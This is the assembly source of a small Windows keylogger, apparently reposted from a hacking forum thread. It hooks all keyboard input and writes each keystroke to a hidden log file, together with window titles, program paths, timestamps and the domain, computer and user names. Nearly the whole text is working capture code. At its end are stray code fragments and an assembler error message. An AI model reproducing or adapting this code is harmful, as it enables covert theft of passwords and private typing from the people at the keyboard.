so obvious if needed, read the AReadMe.txt ; ;******************************************************************************************* .386 .model flat, stdcall option casemap:none include \masm32\include\windows.inc include \masm32\include\kernel32.inc include \masm32\include\user32.inc include \masm32\include\advapi32.inc include \masm32\include\msvcrt.inc include \masm32\macros\macros.asm includelib \masm32\lib\user32.lib includelib \masm32\lib\kernel32.lib includelib \masm32\lib\advapi32.lib includelib \masm32\lib\msvcrt.lib ;== Prototypes ================================================================= KeyBoardProc proto :DWORD, :WPARAM, :LPARAM ;== Prototypes ================================================================= pushz macro szText:VARARG local nexti call nexti db szText,00h nexti: endm .data CopyRight db "CopyRight 2005, ZOverLords@Yahoo.com" Vist db "http://testing.OnlyTheRightAnswers.com " hBuffer dd ? hComputerName db 32 dup(0) hCurrentThreadPiD dd 0 hCurrentWindow dd 0 hDateFormat db "dd MMM yyyy", 0 hDomaineName db 128 dup(0) hFile dd 0 hHook dd 0 hmodul MODULEENTRY32 <> hSnapShot dd 0 hTimeFormat db "hh:mm:ss tt", 0 hUserName db 32 dup(0) msg MSG <> onlyOneCopy db "Global\zkl",0 .code main: invoke CreateMutexA,0,0,ADDR onlyOneCopy invoke GetLastError ; check to make sure we are the only copy running call GetLastError ; for fast user switching we still support one cmp eax,ERROR_ALREADY_EXISTS ; copy per user, but if we are the second copy je more_than_one_copy ; trying to start, we exit xor ebx, ebx invoke RegisterHotKey, NULL, 0badfaceh, MOD_CONTROL or MOD_ALT, VK_F11 pushz "ab" ; append in binary mode pushz "ZKeyLog.txt" ; name of log file call fopen add esp, 2*4 ; all c lib functions need fixup.. ;mov [hFile], eax ; save our file number mov hFile,eax invoke GetModuleHandleA, NULL invoke SetWindowsHookExA, WH_KEYBOARD_LL, ADDR KeyBoardProc, eax, ebx mov [hHook], eax ; ok here is our hook handle for later invoke GetMessageA, ADDR msg, NULL, NULL, NULL invoke UnhookWindowsHookEx, hHook invoke fclose, hFile more_than_one_copy: invoke ExitProcess, 0h ;############################################################## KeyBoardProc PROC nCode:DWORD, wParam:DWORD, lParam:DWORD LOCAL lpKeyState[256] :BYTE LOCAL lpClassName[64] :BYTE LOCAL lpCharBuf[32] :BYTE LOCAL lpDateBuf[12] :BYTE LOCAL lpTimeBuf[12] :BYTE LOCAL lpLocalTime :SYSTEMTIME ;---------------------------- lea edi, [lpKeyState] ; lets zero out our buffers push 256/4 pop ecx xor eax, eax rep stosd ; sets us up for doubleword from EAX mov eax, wParam cmp eax, WM_KEYUP ; only need WM_KEYDOWN je next_hook ; bypass double logging cmp eax, WM_SYSKEYUP ; only Need WM_SYSKEYDOWN je next_hook ; bypass double logging invoke GetForegroundWindow ; get handle for currently used window ( specific to NT ) cmp [hCurrentWindow], eax ; if its different to last one saved.. je no_window_change ; bypass all the headings mov [hCurrentWindow], eax ; save it for use now and compare later invoke GetClassName, hCurrentWindow, ADDR lpClassName, 64 invoke GetLocalTime, ADDR lpLocalTime invoke GetDateFormat, NULL, NULL, ADDR lpLocalTime, ADDR hDateFormat, ADDR lpDateBuf, 12 invoke GetTimeFormat, NULL, NULL, ADDR lpLocalTime, ADDR hTimeFormat, ADDR lpTimeBuf, 12 invoke GetWindowThreadProcessId, hCurrentWindow, ADDR hCurrentThreadPiD invoke CreateToolhelp32Snapshot, TH32CS_SNAPMODULE, hCurrentThreadPiD mov hSnapShot,eax mov hmodul.dwSize, sizeof MODULEENTRY32 invoke Module32First,hSnapShot,addr hmodul invoke CloseHandle,hSnapShot invoke GetWindowText, hCurrentWindow, ADDR lpKeyState, 256 lea esi, [hmodul.szExePath] ; print the current program exe name push esi lea esi, [lpTimeBuf] ; print the formatted time push esi lea esi, [lpDateBuf] ; print the formatted date push esi pushz 13,10,"[%s, %s - Program:%s]",13,10 push [hFile] call fprintf ; write the buffer to cache add esp, 3*4 lea esi, [lpClassName] ; print the current window class name push esi lea esi, [lpKeyState] ; print the current window title push esi pushz 13,10,"[ Window Title:%s - Window Class:%s]",13,10 push [hFile] call fprintf ; write the buffer to cache add esp, 3*4 mov hBuffer, 128 ; get the current domain name invoke GetComputerNameExA, 1, ADDR hDomaineName, ADDR hBuffer mov hBuffer, 32 ; get the current computer name invoke GetComputerNameExA, 0, ADDR hComputerName, ADDR hBuffer mov hBuffer, 32 ; get the current user name invoke GetUserName, ADDR hUserName, ADDR hBuffer lea esi, [hUserName] ; print the current user name push esi lea esi, [hComputerName] ; print the current computer name push esi lea esi, [hDomaineName] ; print the current domain name push esi pushz "[ Domain:%s - Computer:%s - User:%s]",13,10 push [hFile] call fprintf add esp, 3*4 invoke fflush, hFile no_window_change: mov esi, [lParam] ; we don't want to print shift or capslock names. lodsd ; it just makes the logs easier to read without them. cmp al, VK_LSHIFT ; they are tested later when distinguishing between je next_hook ; bypass left shift Key for upper/lowercase characters cmp al, VK_RSHIFT je next_hook ; bypass right shift Key cmp al, VK_CAPITAL je next_hook ; bypass caps lock Key cmp al, VK_ESCAPE je get_name_of_key ; we Want escape characters cmp al, VK_BACK je get_name_of_key ; we want backspace key cmp al, VK_TAB je get_name_of_key ; we want tab key ;------------------ lea edi, [lpCharBuf] ; zero initialise buffer for key text push 32/4 pop ecx xor eax, eax rep stosd ;---------- lea ebx, [lpKeyState] push ebx call GetKeyboardState ; get current keyboard state invoke GetKeyState, VK_LSHIFT xchg esi, eax ; save result in esi invoke GetKeyState, VK_RSHIFT or eax, esi ; al == 1 if either key is DOWN mov byte ptr [ebx + 16], al ; toggle a shift key to on/off invoke GetKeyState, VK_CAPITAL mov byte ptr [ebx + 20], al ; toggle caps lock to on/off mov esi, [lParam] lea edi, [lpCharBuf] push 00h push edi ; buffer for ascii characters push ebx ; keyboard state lodsd xchg eax, edx lodsd push eax ; hardware scan code push edx ; virutal key code call ToAscii ; convert to human readable characters test eax, eax ; if return zero, continue jnz test_carriage_return ; else, write to file. get_name_of_key: ; no need for large table of pointers to get asciiz mov esi, [lParam] lodsd ; skip virtual key code lodsd ; eax = scancode shl eax, 16 xchg eax, ecx lodsd ; extended key info shl eax, 24 or ecx, eax push 32 lea edi, [lpCharBuf] push edi push ecx call GetKeyNameTextA ; get the key text push edi pushz "[%s]" jmp write_to_file test_carriage_return: push edi pushz "%s" cmp byte ptr [edi], 0dh ; carriage return? jne write_to_file mov byte ptr [edi + 1], 0ah ; add linefeed, so logs are easier to read. write_to_file: invoke fprintf, hFile next_hook: invoke CallNextHookEx, hHook, nCode, wParam, lParam ret KeyBoardProc ENDP end main hFile dd 0 invoke fclose, hFile C:\masm32\SOURCE\Log.asm(110) : error A2148: invalid symbol type in expression : fclose Sursa: Basic key logger but very small - rohitab.com - Forums